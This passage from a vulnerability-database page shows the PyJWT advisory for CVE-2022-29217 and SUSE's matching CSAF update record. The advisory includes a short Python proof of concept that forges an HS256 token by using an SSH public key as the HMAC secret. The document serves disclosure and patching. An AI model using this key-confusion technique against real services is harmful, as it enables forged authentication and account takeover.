\"ssh-\":\n# return load_ssh_public_key(key)\n#\n# These should most likely made to match each other to prevent this behavior\n```\n\n\n```python\nimport jwt\n\n#openssl ecparam -genkey -name prime256v1 -noout -out ec256-key-priv.pem\n#openssl ec -in ec256-key-priv.pem -pubout > ec256-key-pub.pem\n#ssh-keygen -y -f ec256-key-priv.pem > ec256-key-ssh.pub\n\npriv_key_bytes = b\"\"\"-----BEGIN EC PRIVATE KEY-----\nMHcCAQEEIOWc7RbaNswMtNtc+n6WZDlUblMr2FBPo79fcGXsJlGQoAoGCCqGSM49\nAwEHoUQDQgAElcy2RSSSgn2RA/xCGko79N+7FwoLZr3Z0ij/ENjow2XpUDwwKEKk\nAk3TDXC9U8nipMlGcY7sDpXp2XyhHEM+Rw==\n-----END EC PRIVATE KEY-----\"\"\"\n\npub_key_bytes = b\"\"\"-----BEGIN PUBLIC KEY-----\nMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAElcy2RSSSgn2RA/xCGko79N+7FwoL\nZr3Z0ij/ENjow2XpUDwwKEKkAk3TDXC9U8nipMlGcY7sDpXp2XyhHEM+Rw==\n-----END PUBLIC KEY-----\"\"\"\n\nssh_key_bytes = b\"\"\"ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJXMtkUkkoJ9kQP8QhpKO/TfuxcKC2a92dIo/xDY6MNl6VA8MChCpAJN0w1wvVPJ4qTJRnGO7A6V6dl8oRxDPkc=\"\"\"\n\n# Making a good jwt token that should work by signing it with the private key\nencoded_good = jwt.encode({\"test\": 1234}, priv_key_bytes, algorithm=\"ES256\")\n\n# Using HMAC with the ssh public key to trick the receiver to think that the public key is a HMAC secret\nencoded_bad = jwt.encode({\"test\": 1234}, ssh_key_bytes, algorithm=\"HS256\")\n\n# Both of the jwt tokens are validated as valid\ndecoded_good = jwt.decode(encoded_good, ssh_key_bytes, algorithms=jwt.algorithms.get_default_algorithms())\ndecoded_bad = jwt.decode(encoded_bad, ssh_key_bytes, algorithms=jwt.algorithms.get_default_algorithms())\n\nif decoded_good == decoded_bad:\n print(\"POC Successfull\")\nelse:\n print(\"POC Failed\")\n```\n\n> The issue is not that big as \n> algorithms=jwt.algorithms.get_default_algorithms() has to be used. \n> However, with quick googling, this seems to be used in some cases at \n> least in some minor projects.\n\n### Patches\n\nUsers should upgrade to v2.4.0.\n\n### Workarounds\n\nAlways be explicit with the algorithms that are accepted and expected when decoding.\n\n### References\n_Are there any links users can visit to find out more?_\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in https://github.com/jpadilla/pyjwt\n* Email José Padilla: pyjwt at jpadilla dot com\n", id: "GHSA-ffqj-6fqr-9h24", modified: "2024-10-15T16:18:12Z", published: "2022-05-24T22:17:27Z", references: [ { type: "WEB", url: "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-ffqj-6fqr-9h24", }, { type: "ADVISORY", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-29217", }, { type: "WEB", url: "https://github.com/jpadilla/pyjwt/commit/9c528670c455b8d948aff95ed50e22940d1ad3fc", }, { type: "PACKAGE", url: "https://github.com/jpadilla/pyjwt", }, { type: "WEB", url: "https://github.com/jpadilla/pyjwt/releases/tag/2.4.0", }, { type: "WEB", url: "https://github.com/pypa/advisory-database/tree/main/vulns/pyjwt/PYSEC-2022-202.yaml", }, { type: "WEB", url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5PK7IQCBVNLYJEFTPHBBPFP72H4WUFNX", }, { type: "WEB", url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6HIYEYZRQEP6QTHT3EHH3RGFYJIHIMAO", }, ], schema_version: "1.4.0", severity: [ { score: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", type: "CVSS_V3", }, ], summary: "Key confusion through non-blocklisted public key formats", }
opensuse-su-2024:12139-1
Vulnerability from csaf_opensuse
Notes
{ document: { aggregate_severity: { namespace: "https://www.suse.com/support/security/rating/", text: "moderate", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright 2024 SUSE LLC. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "python310-PyJWT-2.4.0-1.1 on GA media", title: "Title of the patch", }, { category: "description", text: "These are all security issues fixed in the python310-PyJWT-2.4.0-1.1 package on the GA media of openSUSE Tumbleweed.", title: "Description of the patch", }, { category: "details", text: "openSUSE-Tumbleweed-2024-12139", title: "Patchnames", }, { category: "legal_disclaimer", text: "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).", title: "Terms of use", }, ], publisher: { category: "vendor", contact_details: "https://www.suse.com/support/security/contact/", name: "SUSE Product Security Team", namespace: "https://www.suse.com/", }, references: [ { category: "external", summary: "SUSE ratings", url: "https://www.suse.com/support/security/rating/", }, { category: "self", summary: "URL of this CSAF notice", url: "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2024_12139-1.json", }, { category: "self", summary: "SUSE CVE CVE-2022-29217 page", url: "https://www.suse.com/security/cve/CVE-2022-29217/", }, ], title: "python310-PyJWT-2.4.0-1.1 on GA media", tracking: { current_release_date: "2024-06-15T00:00:00Z", generator: { date: "2024-06-15T00:00:00Z", engine: { name: "cve-database.git:bin/generate-csaf.pl", version: "1", }, }, id: "openSUSE-SU-2024:12139-1", initial_release_date: "2024-06-15T00:00:00Z", revision_history: [ { date: "2024-06-15T00:00:00Z", number: "1", summary: "Current version", }, ], status: "final", version: "1", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_version", name: "python310-PyJWT-2.4.0-1.1.aarch64", product: { name: "python310-PyJWT-2.4.0-1.1.aarch64", product_id: "python310-PyJWT-2.4.0-1.1.aarch64", }, }, { category: "product_version", name: "python38-PyJWT-2.4.0-1.1.aarch64", product: { name: "python38-PyJWT-2.4.0-1.1.aarch64", product_id: "python38-PyJWT-2.4.0-1.1.aarch64", }, }, { category: "product_version", name: "python39-PyJWT-2.4.0-1.1.aarch64", product: { name: "python39-PyJWT-2.4.0-1.1.aarch64", product_id: "python39-PyJWT-2.4.0-1.1.aarch64", }, }, ], category: "architecture", name: "aarch64", }, { branches: [ { category: "product_version", name: "python310-PyJWT-2.4.0-1.1.ppc64le", product: { name: "python310-PyJWT-2.4.0-1.1.ppc64le", product_id: "python310-PyJWT-2.4.0-1.1.ppc64le", }, }, { category: "product_version", name: "python38-PyJWT-2.4.0-1.1.ppc64le", product: { name: "python38-PyJWT-2.4.0-1.1.ppc64le", product_id: "python38-PyJWT-2.4.0-1.1.ppc64le", }, }, { category: "product_version", name: "python39-PyJWT-2.4.0-1.1.ppc64le", product: { name: "python39-PyJWT-2.4.0-1.1.ppc64le", product_id: "python39-PyJWT-2.4.0-1.1.ppc64le", }, }, ], category: "architecture", name: "ppc64le", }, { branches: [ { category: "product_version", name: "python310-PyJWT-2.4.0-1.1.s390x", product: { name: "python310-PyJWT-2.4.0-1.1.s390x", product_id: "python310-PyJWT-2.4.0-1.1.s390x", }, }, { category: "product_version", name: "python38-PyJWT-2.4.0-1.1.s390x", product: { name: "python38-PyJWT-2.4.0-1.1.s390x", product_id: "python38-PyJWT-2.4.0-1.1.s390x", }, }, { category: "product_version", name: "python39-PyJWT-2.4.0-1.1.s390x", product: { name: "python39-PyJWT-2.4.0-1.1.s390x", product_id: "python39-PyJWT-2.4.0-1.1.s390x", }, }, ], category: "architecture", name: "s390x", }, { branches: [ { category: "product_version", name: "python310-PyJWT-2.4.0-1.1.x86_64", product: { name: "python310-PyJWT-2.4.0-1.1.x86_64", product_id: "python310-PyJWT-2.4.0-1.1.x86_64", }, }, { category: "product_version", name: "python38-PyJWT-2.4.0-1.1.x86_64", product: { name: "python38-PyJWT-2.4.0-1.1.x86_64", product_id: "python38-PyJWT-2.4.0-1.1.x86_64", }, }, { category: "product_version", name: "python39-PyJWT-2.4.0-1.1.x86_64", product: { name: "python39-PyJWT-2.4.0-1.1.x86_64", product_id: "python39-PyJWT-2.4.0-1.1.x86_64", }, }, ], category: "architecture", name: "x86_64", }, { branches: [ { category: "product_name", name: "openSUSE Tumbleweed", product: { name: "openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed", product_identification_helper: { cpe: "cpe:/o:opensuse:tumbleweed", }, }, }, ], category: "product_family", name: "SUSE Linux Enterprise", }, ], category: "vendor", name: "SUSE", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "python310-PyJWT-2.4.0-1.1.aarch64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python310-PyJWT-2.4.0-1.1.aarch64", }, product_reference: "python310-PyJWT-2.4.0-1.1.aarch64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python310-PyJWT-2.4.0-1.1.ppc64le as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python310-PyJWT-2.4.0-1.1.ppc64le", }, product_reference: "python310-PyJWT-2.4.0-1.1.ppc64le", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python310-PyJWT-2.4.0-1.1.s390x as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python310-PyJWT-2.4.0-1.1.s390x", }, product_reference: "python310-PyJWT-2.4.0-1.1.s390x", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python310-PyJWT-2.4.0-1.1.x86_64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python310-PyJWT-2.4.0-1.1.x86_64", }, product_reference: "python310-PyJWT-2.4.0-1.1.x86_64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python38-PyJWT-2.4.0-1.1.aarch64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python38-PyJWT-2.4.0-1.1.aarch64", }, product_reference: "python38-PyJWT-2.4.0-1.1.aarch64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python38-PyJWT-2.4.0-1.1.ppc64le as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python38-PyJWT-2.4.0-1.1.ppc64le", }, product_reference: "python38-PyJWT-2.4.0-1.1.ppc64le", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python38-PyJWT-2.4.0-1.1.s390x as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python38-PyJWT-2.4.0-1.1.s390x", }, product_reference: "python38-PyJWT-2.4.0-1.1.s390x", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python38-PyJWT-2.4.0-1.1.x86_64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python38-PyJWT-2.4.0-1.1.x86_64", }, product_reference: "python38-PyJWT-2.4.0-1.1.x86_64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python39-PyJWT-2.4.0-1.1.aarch64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python39-PyJWT-2.4.0-1.1.aarch64", }, product_reference: "python39-PyJWT-2.4.0-1.1.aarch64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python39-PyJWT-2.4.0-1.1.ppc64le as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python39-PyJWT-2.4.0-1.1.ppc64le", }, product_reference: "python39-PyJWT-2.4.0-1.1.ppc64le", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python39-PyJWT-2.4.0-1.1.s390x as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python39-PyJWT-2.4.0-1.1.s390x", }, product_reference: "python39-PyJWT-2.4.0-1.1.s390x", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python39-PyJWT-2.4.0-1.1.x86_64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python39-PyJWT-2.4.0-1.1.x86_64", }, product_reference: "python39-PyJWT-2.4.0-1.1.x86_64", relates_to_product_reference: "openSUSE Tumbleweed", }, ], }, vulnerabilities: [ { cve: "CVE-2022-29217", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2022-29217", }, ], notes: [ { category: "general", text: "PyJWT is a Python implementation of RFC 7519. PyJWT supports multiple different JWT signing algorithms. With JWT, an attacker submitting the JWT token can choose the used signing algorithm. The PyJWT library requires that the application chooses what algorithms are supported. The application can specify `jwt.algorithms.get_default_algorithms()` to get support for all algorithms, or specify a single algorithm. The issue is not that big as `algorithms=jwt.algorithms.get_default_algorithms()` has to be used. Users should upgrade to v2.4.0 to receive a patch for this issue. As a workaround, always be explicit with the algorithms that are accepted and expected when decoding.", title: "CVE description", }, ], product_status: { recommended: [ "openSUSE Tumbleweed:python310-PyJWT-2.4.0-1.1.aarch64", "openSUSE Tumbleweed:python310-PyJWT-2.4.0-1.1.ppc64le", "openSUSE Tumbleweed:python310-PyJWT-2.4.0-1.1.s390x", "openSUSE Tumbleweed:python310-PyJWT-2.4.0-1.1.x86_64", "openSUSE Tumbleweed:python38-PyJWT-2.4.0-1.1.aarch64", "openSUSE Tumbleweed:python38-PyJWT-2.4.0-1.1.ppc64le", "openSUSE Tumbleweed:python38-PyJWT-2.4.0-1.1.s390x", "openSUSE Tumbleweed:python38-PyJWT-2.4.0-1.1.x86_64", "openSUSE Tumbleweed:python39-PyJWT-2.4.0-1.1.aarch64", "openSUSE Tumbleweed:python39-PyJWT-2.4.0-1.1.ppc64le", "openSUSE Tumbleweed:python39-PyJWT-2.4.0-1.1.s390x", "openSUSE Tumbleweed:python39-PyJWT-2.4.0-1.1.x86_64", ], }, references: [ { category: "external", summary: "CVE-2022-29217", url: "https://www.suse.com/security/cve/CVE-2022-29217", }, { category: "external", summary: "SUSE Bug 1199756 for CVE-2022-29217", url: "https://bugzilla.suse.com/1199756", }, { category: "external", summary: "SUSE Bug 1223417 for CVE-2022-29217", url: "https://bugzilla.suse.com/1223417", }, { category: "external", summary: "SUSE Bug 1226138 for CVE-2022-29217", url: "https://bugzilla.suse.com/1226138", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "openSUSE Tumbleweed:python310-PyJWT-2.4.0-1.1.aarch64", "openSUSE Tumbleweed:python310-PyJWT-2.4.0-1.1.ppc64le", "openSUSE Tumbleweed:python310-PyJWT-2.4.0-1.1.s390x", "openSUSE Tumbleweed:python310-PyJWT-2.4.0-1.1.x86_64", "openSUSE Tumbleweed:python38-PyJWT-2.4.0-1.1.aarch64", "openSUSE Tumbleweed:python38-PyJWT-2.4.0-1.1.ppc64le", "openSUSE Tumbleweed:python38-PyJWT-2.4.0-1.1.s390x", "openSUSE Tumbleweed:python38-PyJWT-2.4.0-1.1.x86_64", "openSUSE Tumbleweed:python39-PyJWT-2.4.0-1.1.aarch64", "openSUSE Tumbleweed:python39-PyJWT-2.4.0-1.1.ppc64le", "openSUSE Tumbleweed:python39-PyJWT-2.4.0-1.1.s390x", "openSUSE Tumbleweed:python39-PyJWT-2.4.0-1.1.x86_64", ], }, ], scores: [ { cvss_v3: { baseScore: 7.5, baseSeverity: "HIGH", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", version: "3.1", }, products: [ "openSUSE Tumbleweed:python310-PyJWT-2.4.0-1.1.aarch64", "openSUSE Tumbleweed:python310-PyJWT-2.4.0-1.1.ppc64le", "openSUSE Tumbleweed:python310-PyJWT-2.4.0-1.1.s390x", "openSUSE Tumbleweed:python310-PyJWT-2.4.0-1.1.x86_64", "openSUSE Tumbleweed:python38-PyJWT-2.4.0-1.1.aarch64", "openSUSE Tumbleweed:python38-PyJWT-2.4.0-1.1.ppc64le", "openSUSE Tumbleweed:python38-PyJWT-2.4.0-1.1.s390x", "openSUSE Tumbleweed:python38-PyJWT-2.4.0-1.1.x86_64", "openSUSE Tumbleweed:python39-PyJWT-2.4.0-1.1.aarch64", "openSUSE Tumbleweed:python39-PyJWT-2.4.0-1.1.ppc64le", "openSUSE Tumbleweed:python39-PyJWT-2.4.0-1.1.s390x", "openSUSE Tumbleweed:python39-PyJWT-2.4.0-1.1.x86_64", ], }, ], threats: [ { category: "impact", date: "2024-06-15T00:00:00Z", details: "important", }, ], title: "CVE-2022-29217", }, ], }
Log in or create an account to share your comment.
This schema specifies the format of a comment related to a security advisory.
Sightings
Author | Source | Type | Date |
---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.